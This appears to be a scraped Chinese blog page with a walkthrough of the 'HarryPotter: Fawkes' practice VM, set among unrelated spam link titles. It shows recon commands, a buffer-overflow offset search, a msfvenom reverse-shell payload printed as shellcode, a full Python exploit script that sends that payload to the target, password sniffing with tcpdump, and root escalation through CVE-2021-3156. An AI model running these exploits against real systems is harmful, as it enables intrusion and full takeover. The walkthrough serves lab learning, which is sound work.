当前位置: 首页 > news >正文

网站排名优化软件有哪些外包公司的优势和劣势

网站排名优化软件有哪些,外包公司的优势和劣势,网页设计与制作字体设置,化妆品品牌推广方案文章目录 信息收集主机发现端口扫描dirsearch扫描gobuster扫描 漏洞利用缓冲区溢出edb-debugger工具msf-pattern工具 docker容器内提权tcpdump流量分析容器外- sudo漏洞提权 靶机文档#xff1a;HarryPotter: Fawkes 下载地址#xff1a;Download (Mirror) 难易程度#xff… 文章目录 信息收集主机发现端口扫描dirsearch扫描gobuster扫描 漏洞利用缓冲区溢出edb-debugger工具msf-pattern工具 docker容器内提权tcpdump流量分析容器外- sudo漏洞提权 靶机文档HarryPotter: Fawkes 下载地址Download (Mirror) 难易程度难上难 信息收集 主机发现 sudo netdiscover -r 192.168.8.0/24端口扫描 sudo nmap -A -p- 192.168.8.128开放了ftp,web,ssh等服务 访问80端口 dirsearch扫描 gobuster扫描 gobuster dir -u http://192.168.8.128 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html尽管使用了两个扫描工具还是没有什么有用的信息 访问ftp看看有 什么信息 ELF是一种文件格式是Linux的执行文件 赋予该 文件执行权限执行后没有反应 查看运行端口号 ss 是 Socket Statistics 的缩写。ss 命令可以用来获取 socket 统计信息它显示的内容和 netstat 类似。但 ss 的优势在于它能够显示更多更详细的有关 TCP 和连接状态的信息而且比 netstat 更快。当服务器的 socket 连接数量变得非常大时无论是使用 netstat 命令还是直接 cat /proc/net/tcp执行速度都会很慢。ss 命令利用到了 TCP 协议栈中 tcp_diag。tcp_diag 是一个用于分析统计的模块可以获得 Linux 内核中第一手的信息因此 ss 命令的性能会好很多。-p, –processes 显示监听端口的进程(Ubuntu 上需要 sudo) -a, –all 对 TCP 协议来说既包含监听的端口也包含建立的连接 -n, –numeric 不解析服务的名称如 “22” 端口不会显示成 “ssh” -t, –tcp 显示 TCP 协议的 sockets -u, –udp 显示 UDP 协议的 sockets 发现端口号发端口扫描的时候一样都是9898 使用nc工具尝试监听本地9898端口 给出的信息和端口扫描的时候得出的信息一样 漏洞利用 缓冲区溢出 进行缓冲区溢出测试之前需要关闭ASLR aslr是一种针对缓冲区溢出的安全保护技术通过对堆、栈、共享库映射等线性区布局的随机化通过增加攻击者预测目的地址的难度防止攻击者直接定位攻击代码位置达到阻止溢出攻击的目的的一种技术。如今LinuxWindows等主流操作系统都已采用了该技术。 将kali上的ALSR安全机制关闭该技术会导致地址空间随机化不便调试 ALSR由 /proc/sys/kernel/randomize_va_space 决定默认为2 0 - 表示关闭进程地址空间随机化 1 - 表示将mmap的基址stack和vdso页面随机化。 2 - 表示在1的基础上增加栈heap的随机化。 echo 0 /proc/sys/kernel/randomize_va_spaceedb-debugger工具 apt install deb-bebugger安装这个图形化程序调试工具 如果安装不上可以从Github上拉取到本地再进行编译 安装依赖 sudo apt-get install pkg-config sudo apt-get install cmake sudo apt-get install build-essential sudo apt-get install libboost-dev sudo apt-get install libqt5xmlpatterns5-dev sudo apt-get install qtbase5-dev sudo apt-get install qt5-default sudo apt-get install libgraphviz-dev sudo apt-get install libqt5svg5-dev sudo apt-get install libcapstone-dev # build and run edb $ git clone --recursive https://github.com/eteran/edb-debugger.git $ cd edb-debugger $ mkdir build $ cd build $ cmake -DCMAKE_INSTALL_PREFIX/usr/local/ .. $ make $ sudo make install $ edb打开后点击attach功能通过关键字选择已经跑起来的程序server_hogwarts前提kali已经启动了server_hogwarts程序点击开始按钮运行 使用Python生成500个A进行一般探测 python -c print(A*500)nc连接访问9898端口注入生成的500个A 发现目标程序崩溃位置0x41414141出现了错误 EIP寄存器存储的是下一个指令的内存地址而ESP寄存器中存储的是具体命令 msf-pattern工具 寻找缓冲区溢出位置 使用msf生成500个随机字符串 msf-pattern_create -l 500重新打开一次那个文件还有edb将生成的字符串输入到咒语选择的地方 通过报错提示我们得知0×64413764内存位置有问题那这个位置很有可能就是想找的溢出位置 查找该段编码对应的字符串在模式字符串中的偏移量 msf-pattern_offset -l 500 -q 64413764也就是说从模式字符串中的第113个字符串开始造成了栈溢出 找到偏移位置后构造反弹shell要将构造的反弹shell十六进制后放入到ESP中再让EIP指向ESP反弹shell被执行 找到 jmp esp 指令并记录其地址0x08049d55 由于机器指令需要反写转化为16进制 08049d55----559d0408----\x55\x9d\x04\x08需要写入EIP的内容使用Msfvenom构造反弹shell Msfvenom它是一个是用来生成后门的软件 msfvenom -p linux/x86/shell_reverse_tcp LHOST192.168.8.8 LPORT6868 -b \x00 -f python# LHOST改为 kali 的 IP # LPORT改为监听反弹 shell 的端口号 # -b \x00过滤坏字符’\0’避免输入提前终止得出的Payload buf b buf b\xbb\xae\xef\x70\xa4\xda\xd0\xd9\x74\x24\xf4\x5a buf b\x33\xc9\xb1\x12\x83\xea\xfc\x31\x5a\x0e\x03\xf4 buf b\xe1\x92\x51\x39\x25\xa5\x79\x6a\x9a\x19\x14\x8e buf b\x95\x7f\x58\xe8\x68\xff\x0a\xad\xc2\x3f\xe0\xcd buf b\x6a\x39\x03\xa5\xac\x11\xfb\x3d\x45\x60\xfc\x27 buf b\x41\xed\x1d\xe7\x0f\xbe\x8c\x54\x63\x3d\xa6\xbb buf b\x4e\xc2\xea\x53\x3f\xec\x79\xcb\xd7\xdd\x52\x69 buf b\x41\xab\x4e\x3f\xc2\x22\x71\x0f\xef\xf9\xf2构造exp脚本 # exp.py import struct, socket,sysbuf b buf b\xbb\xae\xef\x70\xa4\xda\xd0\xd9\x74\x24\xf4\x5a buf b\x33\xc9\xb1\x12\x83\xea\xfc\x31\x5a\x0e\x03\xf4 buf b\xe1\x92\x51\x39\x25\xa5\x79\x6a\x9a\x19\x14\x8e buf b\x95\x7f\x58\xe8\x68\xff\x0a\xad\xc2\x3f\xe0\xcd buf b\x6a\x39\x03\xa5\xac\x11\xfb\x3d\x45\x60\xfc\x27 buf b\x41\xed\x1d\xe7\x0f\xbe\x8c\x54\x63\x3d\xa6\xbb buf b\x4e\xc2\xea\x53\x3f\xec\x79\xcb\xd7\xdd\x52\x69 buf b\x41\xab\x4e\x3f\xc2\x22\x71\x0f\xef\xf9\xf2payload bA*112 b\x55\x9d\x04\x08 b\x90*32 buf #payload 112 * bA struct.pack(I,0x08049d55) 32 * b\x90 buf try:s socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((192.168.8.8, 9898))s.send((payload))s.close() except:print(Wrong!)sys.exit() 成功拿到shell docker容器内提权 在harry的目录下查看到.mycreds.txt中有一串疑似密码的字符串Harryp0tterHogwarts123查看是否可以用来ssh登录 22端口下发现无法进入前面端口探测到2222端口也是ssh服务尝试在2222端口连接 harry : HarrYp0tterHogwarts123 ssh harry192.168.8.128 -p 2222连接成功第一件事就是看看有没有能够以root省份执行的命令 结果发现有所有的权限而且还有不需要密码 sudo -i使用root用户的环境变量跳转到/root拥有超级管理员权限 sudo -s使用当前用户的环境变量不跳转目录拥有超级管理员权限 查看root目录下 tcpdump流量分析 Linux作为网络服务器特别是作为路由器和网关时数据的采集和分析是不可少的。TcpDump是Linux中强大的网络数据采集分析工具之一。 tcpdump可以根据使用者需求对网络上传输的数据包进行捕获的抓包工具windows平台有wireshark等工具tcpdump可以将网络中传输的数据包的“包头”全部捕获过来进行分析其支持网络层、特定的传输协议、数据发送和接收的主机、网卡和端口的过滤并提供and、or、not等语句进行逻辑组合捕获数据包或去掉不用的信息根据提示是要让我们把21端口的流量 监听分析一下同时使用ip a发现这应该不是靶机本体应该是在一个docker中根据ip地址进行判断这个2222端口应该是docker中的ssh所以我们并没有进入到靶机本体的22端口 监听21端口流量 tcpdump -i eth0 port 21发现 neville用户密码bL!Bsg3k 连接22端口成功并且找到了第二个flag 再次查看ip此时已经从docker容器里出来了 容器外- sudo漏洞提权 查看sudo 版本 sudo --version网上找出该版本是sudo堆溢出漏洞漏洞编号CVE-2021-3156普通用户可以通过利用此漏洞在默认配置的 sudo 主机上获取root权限 exp地址:https://github.com/worawit/CVE-2021-3156/blob/main/exploit_nss.py 在靶机中查看sudo的路径 which sudo 然后修改下载的exp里的SUDO_PATH 靶机开启监听端口6868 nc -lvnp 6868 exploit_nss.pykali机访问靶机的6868端口上传修改好的exp nc 192.168.8.128 6868 exploit_nss.py -w 1在靶机上运行exp即可提权成功
http://www.dnsts.com.cn/news/147603.html

相关文章:

  • 西安做网站电话国际大型门户网站
  • 深圳门户网站建设方案宣讲家网站 家风建设
  • 狼们求个没封的免费网站网站开发软件英文版
  • 对单位网站的要求吗建设银行网站看不到e商
  • 新网站快速收录wordpress加入博客
  • 怎么做网站和注册域名开发微信小程序公司
  • 青岛网站设计建立公司建设网页制作
  • 介绍一个电影的网站模板下载龙华建网站
  • 嘉兴网站托管做网站培训
  • 建设网站图片大全杭州网站搜索
  • 招远网站建设网站建设的制度
  • 宝塔建站wordpress免费php网站模板下载
  • 哪里建个人网站好wordpress网站都有哪些
  • 查公司查企业用什么网站ps网站首页怎么做
  • 知名网站域名被抢注企业宣传片的制作流程
  • 网站更改公司需要重新备案吗wordpress文章图片不显示
  • 个人企业网站公司视频宣传片
  • 英文网站流量统计近期新闻热点
  • 毕业设计做视频网站设计网络服务提供者是谁
  • 帮企业建网站网站的域名分为哪些
  • 如何免费做网站赚钱宁波建网站如何收费
  • 网站备案 深圳如何宣传自己的网站
  • 百度网盟推广的 合作网站加强学院网站的建设与管理
  • app开发怎么赚钱搜索引擎优化工作
  • 如何自己做优惠券网站邢台123生活网
  • 东三省网站建设公司廊坊快速排名优化
  • 郑州做旅游网站的公司网络科技公司一般做什么
  • 360网站推广官网网址企业整套vi设计都包含哪些
  • 酒店网站建设注意什么58同城企业网站怎么做的
  • 刷排名的软件是什么南通网站优化